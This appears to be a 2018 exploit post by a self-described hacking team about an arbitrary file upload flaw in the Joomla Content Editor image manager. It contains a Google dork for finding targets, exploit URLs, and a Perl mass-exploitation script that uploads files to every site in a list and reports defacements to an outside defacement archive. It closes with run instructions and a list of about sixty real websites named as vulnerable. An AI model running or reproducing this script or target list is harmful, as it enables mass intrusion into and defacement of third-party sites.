facebook facebook twitter rss

oomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability

Author: KingSkrupellos , Published: 11-10-2018
# Exploit Title :  Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
# Vendor Homepage : joomlacontenteditor.net
# Software Download Link : joomlacontenteditor.net/downloads / extensions.joomla.org/extension/jce/
# Exploit Risk : High
# CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CXSecurity [ Author : KingSkrupellos ] : cxsecurity.com/ascii/WLB-2018050200
# Cyberizm : cyberizm.org/cyberizm-joomla-content-editor-jce-auto-mass-exploiter.html

#################################################################################

Exploit Title : Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter

Google Dork [ Example ] => inurl:''/index.php?option=com_jce''

You can search all plugins and themes to find more sites. Most of them have this plugin JCE installed.

[ % 40 or more ] Use your brain.

Explanation for Joomla Content Editor JCE => [ ScreenShot ] https://cdn.pbrd.co/images/Hmx6KZC.jpg

JCE makes creating and editing Joomla!® content easy...
Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS...

Office-like functions and familiar buttons make formatting simple
Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface
Create Links to Categories, Articles, Weblinks and Contacts¹ in your site using a unique and practical Link Browser
Easily tab between WYSIWYG, Code and Preview modes.
Create Tables, edit Styles, format text and more...
Integrated Spellchecking using your browser's Spellchecker
Fine-grained control over the editor layout and features with Editor Profiles

Media Manager => Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®,
Windows Media Player® and HTML 5 Video and Audio.
Easily insert Youtube and Vimeo videos - just paste in the URL and Insert!
Insert HTML5 Video and Audio with multiple source options

Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor
Insert multiple images. Create responsive images with the srcset attribute
Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension

Filemanager => Create links to images, documents, media and other common file types
Include a file type icon, file size and modified date
Insert as a link or embed the document with an iframe
Create downloadable files using the download attribute.

Template Manager => Insert pre-defined template content form html or text files
Create template snippet files from whole articles or selected content
Configure the Template Manager to set the startup content of new articles

#################################################################################

Severity: High [ ScreenShot for JCE Editor ] => https://cdn.pbrd.co/images/HmypA0v.png

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

The component is prone to a the following security vulnerabilities:

1. A cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to
the 'search' parameter of the 'administrator/index.php' script.

2. A security-bypass vulnerability occurs due to an error in the 'components/com_jce/editor/extensions/browser/file.php' script.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Affected JCE 2.1.0 is vulnerable; other versions may also be affected.

References => https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27481

References => https://www.securityfocus.com/bid/53630

Note : This Joomla JCE is not the previous exploit going to this path => ..../images/stories/......php => NOT

This JCE is well-known by some hackers but some hackers do not know about nothing about this vulnerability. So this is the new one.

TARGETSİTE/yourfilename.png .gif .jpg or TARGETSİTE/images/yourfilename.html .php .asp .jpg .gif .png

#################################################################################

Notes =>

Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] =>

https://cdn.pbrd.co/images/Hmx6KZC.jpg

An Attacker cannot reach this image manager without username and password on the control panel.

But there is a little trick to upload a image or a file behind this vulnerability.

One Attacker must execute with remote file upload code.

Watch Videos from Original Sources =>

Install JCE Editor in Joomla! 2.5 Tutorial

[video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video]

Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial

[video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video]

How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability

[video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video]

#################################################################################

You can check with this exploit codes on your browser if the sites are vulnerable for testing the security. So you will see some errors.

Exploit => ....../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20

{"result":{"error":true,"result":""},"error":null}

Exploit => ...../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

or giving this error => {"result":null,"error":"No function call specified!"}

Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/

{"result":null,"error":"No function call specified!"}

Path => TARGETSİTE/yourfilename.png gif jpg or TARGETSİTE/images/yourfilename.png gif jpg html txt

#################################################################################

Auto Mass Exploiter Perl =>

[code]#!/usr/bin/perl
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
$ua->timeout (10);
system('title JCE Mass Auto Exploiter by KingSkrupellos');
print "JCE Mass Auto Exploiter\n";
print "Coded by KingSkrupellos\n";
print "Cyberizm Digital Security Team\n";
print "Sitelerin Listesi Reyis:";
my $list=<STDIN>;
chomp($list);
open (THETARGET, "<$list") || die ">>>Web sitesi listesi açılamıyor<<< !";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;

foreach $site(@TARGETS){

chomp $site;
if($site !~ /http:\/\//) { $site = "http://$site/"; };
$exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
print "wait upload $site\n";

$vulnurl=$site.$exploiturl;
$res = $ua->get($vulnurl)->content;
if ($res =~ m/No function call specified!/i){
open(save, '>>C:\Users\Kullanıcılar\KingSkrupellos\result\list.txt');

print "\n[Uploading]";
my $res = $ua->post($vulnurl,
Content_Type => 'form-data',
Content => [
'upload-dir' => './../../',
'upload-overwrite' => 0,
'Filedata' => ["kingskrupellos.png"],
'action' => 'upload'

]
)->decoded_content;
if ($res =~ m/"error":false/i){

}else{
print " ......... ";
print color('bold white');
print "[";
print color('reset');
print color('bold green');
print "PATCHED";
print color('reset');
print color('bold white');
print "] \n";
print color('reset');
}

$remote = IO::Socket::INET->new(
Proto=>
PeerAddr=>"$site",
PeerPort=>
Timeout=>
);
$def= "$site/kingskrupellos.png";
print colored ("[+]Basarili",'white on_red'),"\n";
print "$site/kingskrupellos.png\n";
}else{
print colored (">>Exploit Olmadi<<",'white on_blue'),"\n";
}
}
sub zonpost{
$req = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($req);
$ar = $response->content;
if ($ar =~ /Hacked By KingSkrupellos/){

$dmn= $link;
$def="KingSkrupellos";
$zn="http://aljyyosh.org/single.php";
$lwp=LWP::UserAgent->new;
$res=$lwp -> post($zn,[
'defacer' => $def,
'domain1' => $dmn,
'hackmode' => '15',
'reason' => '1',
'Gönder' => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print colored ("[-]Gönder $1",'white on_green'),"\n";
}
else
{
print colored ("[-]Hata",'black on_white'),"\n";
}
}else{
print" Zone Alınmadı !! \n";

}
}[/code]

How to use this code on your operating system like Windows ;

Open Start + Go to Search Button + Type + Command Prompt [ Komut İstemi ] => or cmd.exe

Or you can use ConEmulator for Windows => https://conemu.github.io => Download it and use it.

Create a folder like " jcee " and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt

C:/Users/Your-Computer-Name/ cd Desktop

cd "jcee"

perl yourexploitcodenamejce.pl

site.txt

Waiting for Upload

Exploit Successful or Not

Finished

# Uploaded File/Image Directory Path =>

TARGETDOMAIN/yourfilename.png .jpg .gif

TARGETDOMAIN/images/yourfilename.png .jpg .gif

#################################################################################

Example Vulnerable Sites =>

aXbcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/

{"result":{"error":true,"result":""},"error":null} => [ Proof of Concept ] => archive.is/J2eX0 => archive.is/YFanj

sXv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

bXuses.co.il/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

irm.edu.vn/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

pigpilot.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

deep-centr.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

wintotal.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

restaurante-chines.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

artlife54.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

litekstent.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

artstairs.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

telltale.co.za/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

zivapodstran.cz/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

littlefolkvisuals.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

practicsa.ro/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

tis.co.th/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

newconcept-cleaning.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

basolatogucciardi.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

finansure.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

kansystem.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

comtec.rs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

esmikom.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

farmacovigilanza-online.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

djgonis.gr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

diktatura.lt/main/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

despachosdigitales.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

gebaeudereinigung-pesch.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

jeddah4arch.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

swmoveisplanejados.com.br/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

psychologie.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

rolsteigerkopen.nl/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

studiocontabilecapuana.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

traversatacarnica.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

arcade-sages-femmes.ch/asf/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

alamoconsulting.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

asociacionchajulense.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

caseyfiliaci.com/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

dermedica.biz/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

custer.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

gimsusz.pl/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

guayab.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

physiotherapie-wenus.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

quintasaojoao.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

ocetehnotrade.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

psxm-tkdm.gr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

confatech.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

jeffcole.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

cabanascamilo.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

thesurelink.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

oddjobthesailor.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

linalux-montlesoie.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

mgsopop.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

pascal-it.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

sicurservice.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

balzamcda.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

diaocsontra.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

juergenlagger.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

johnmcfaddenattorney.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

spacious.com.tw/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

kims-ltd.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

percyparkminis.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

THE END
#################################################################################

Discovered By KingSkrupellos from Cyberizm Digital Security Team

#################################################################################

Like us on Facebook :